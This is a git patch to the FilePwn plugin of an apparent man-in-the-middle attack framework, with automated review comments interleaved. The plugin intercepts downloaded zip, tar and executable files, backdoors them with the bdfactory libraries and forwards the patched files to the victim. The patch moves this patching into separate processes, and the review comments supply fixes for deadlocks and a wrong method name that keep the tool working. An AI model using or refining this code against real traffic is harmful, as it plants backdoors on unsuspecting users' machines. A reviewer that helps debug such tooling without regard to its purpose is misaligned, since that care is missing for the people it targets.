From df9fd2d12a1cdba1aadf8076f54d81205959221b Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Wed, 1 Apr 2015 01:11:40 +0200
Subject: [PATCH] Filepwn plugin now uses multiprocessing to patch binaries
---
 plugins/FilePwn.py | 55 +++++++++++++++++++++++++++++++++++----------
 1 file changed, 42 insertions(+), 13 deletions(-)
diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py
index e95ea8b..bd1f6bd 100644
--- a/plugins/FilePwn.py
+++ b/plugins/FilePwn.py
@@ -65,6 +65,8 @@ import shutil
 import random
 import string
 import tarfile
+import multiprocessing
+
 from libs.bdfactory import pebin
 from libs.bdfactory import elfbin
 from libs.bdfactory import machobin
@@ -85,6 +87,8 @@ class FilePwn(Plugin):
 '''Called if plugin is enabled, passed the options namespace''' self.options = options + self.patched = multiprocessing.Queue() + #FOR FUTURE USE self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
@@ -282,7 +286,8 @@ class FilePwn(Plugin):
 )
 result = targetFile.run_this()
- return result
+ self.patched.put(result)
+ return
 except Exception as e:
 print 'Exception', str(e)
@@ -297,7 +302,8 @@ class FilePwn(Plugin):
 if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
 print "[!] TarFile over allowed size"
 logging.info("TarFIle maxSize met %s", len(aTarFileBytes))
- return aTarFileBytes
+ self.patched.put(aTarFileBytes)
+ return
 with tempfile.NamedTemporaryFile() as tarFileStorage:
 tarFileStorage.write(aTarFileBytes)
@@ -305,7 +311,8 @@ class FilePwn(Plugin):
 if not tarfile.is_tarfile(tarFileStorage.name):
 print '[!] Not a tar file'
- return aTarFileBytes
+ self.patched.put(aTarFileBytes)
+ return
 compressionMode = ':'
 if formatt == 'gz':
@@ -322,7 +329,8 @@ class FilePwn(Plugin):
 if tarFile is None:
 print '[!] Not a tar file'
- return aTarFileBytes
+ self.patched.put(aTarFileBytes)
+ return
 print '[*] Tar file contents and info:'
 print '[*] Compression:', formatt
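Review bot: In the `binaryGrinder` hunk (-282,7 +286,8) the result is now delivered only through `self.patched.put(result)`, but the `except Exception` branch visible directly below still only prints, so on that path nothing is queued and the `self.patched.get()` added in `handleResponse` would block indefinitely. Adding `self.patched.put(None)` to the handler, or reading with `self.patched.get(timeout=N)` and treating `Queue.Empty` as "not patched", keeps the caller from hanging. The path shown also returns `None` now, so any caller that still uses the return value (for instance the archive handlers, if they call this method; not visible in these hunks) would see every file as unpatched and leave an extra item on the shared `self.patched` queue. The function starts and ends outside the hunk.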
@@ -408,9 +416,11 @@ class FilePwn(Plugin):
 if wasPatched is False: # If nothing was changed return the original print "[*] No files were patched forwarding original file" - return aTarFileBytes + self.patched.put(aTarFileBytes) + return else: - return ret + self.patched.put(ret) + return def zip_files(self, aZipFile): "When called will unpack and edit a Zip File and return a zip file"
@@ -420,7 +430,8 @@ class FilePwn(Plugin):
 if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
 print "[!] ZipFile over allowed size"
 logging.info("ZipFIle maxSize met %s", len(aZipFile))
- return aZipFile
+ self.patched.put(aZipFile)
+ return
 tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
 tmpDir = '/tmp/' + tmpRan
@@ -520,9 +531,11 @@ class FilePwn(Plugin):
 if wasPatched is False:
 print "[*] No files were patched forwarding original file"
- return aZipFile
+ self.patched.put(aZipFile)
+ return
 else:
- return tempZipFile
+ self.patched.put(tempZipFile)
+ return
 def handleResponse(self, request, data):
@@ -533,7 +546,13 @@ class FilePwn(Plugin):
 if self.bytes_have_format(data, 'zip'): logging.info("%s Detected supported zip file type!" % client_ip) - bd_zip = self.zip_files(data) + + process = multiprocessing.Process(target=self.zip, args=(data,)) + process.daemon = True + process.start() + process.join() + bd_zip = self.patched.get() + if bd_zip: logging.info("%s Patching complete, forwarding to client" % client_ip) return {'request': request, 'data': bd_zip}
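Review bot: The `zip_files` docstring shown at the end of the previous hunk still reads "When called will unpack and edit a Zip File and return a zip file", but after this hunk (-420,7 +430,8) and the -520 hunk every changed path puts its result on `self.patched` and returns `None`. I would update it to `"Unpack and patch a zip archive; put the result (or the original bytes when nothing was patched) on self.patched and return None."`. The same correction applies to `tar_files` if its docstring, which is outside the diff, makes the same promise. `zip_files` continues past this hunk.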
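Review bot: `target=self.zip` in the zip branch of `handleResponse` (-533,7 +546,13) names an attribute that no hunk defines; the method patched above is `zip_files`, so unless `zip` exists elsewhere on the class this raises `AttributeError` before the child starts, and the line should read `process = multiprocessing.Process(target=self.zip_files, args=(data,))`. Separately, `process.join()` runs before `self.patched.get()`: a child that has put a large object on a `multiprocessing.Queue` does not exit until that data has been flushed to the pipe, so joining first can deadlock on archive-sized payloads. Reading first and joining afterwards (`bd_zip = self.patched.get()` then `process.join()`) avoids that, and the same reordering applies to the tar hunk (-542) and the binary hunk (-556). `handleResponse` begins just before this hunk and continues past it.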
@@ -542,7 +561,13 @@ class FilePwn(Plugin):
 for tartype in ['gz','bz','tar']: if self.bytes_have_format(data, tartype): logging.info("%s Detected supported tar file type!" % client_ip) - bd_tar = self.tar_files(data) + + process = multiprocessing.Process(target=self.tar_files, args=(data,)) + process.daemon = True + process.start() + process.join() + bd_tar = self.patched.get() + if bd_tar: logging.info("%s Patching complete, forwarding to client" % client_ip) return {'request': request, 'data': bd_tar}
@@ -556,8 +581,12 @@ class FilePwn(Plugin):
 with open(tmpFile, 'w') as f: f.write(data) - patchb = self.binaryGrinder(tmpFile) - + process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,)) + process.daemon = True + process.start() + process.join() + patchb = self.patched.get() + if patchb: bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() os.remove('./backdoored/' + os.path.basename(tmpFile))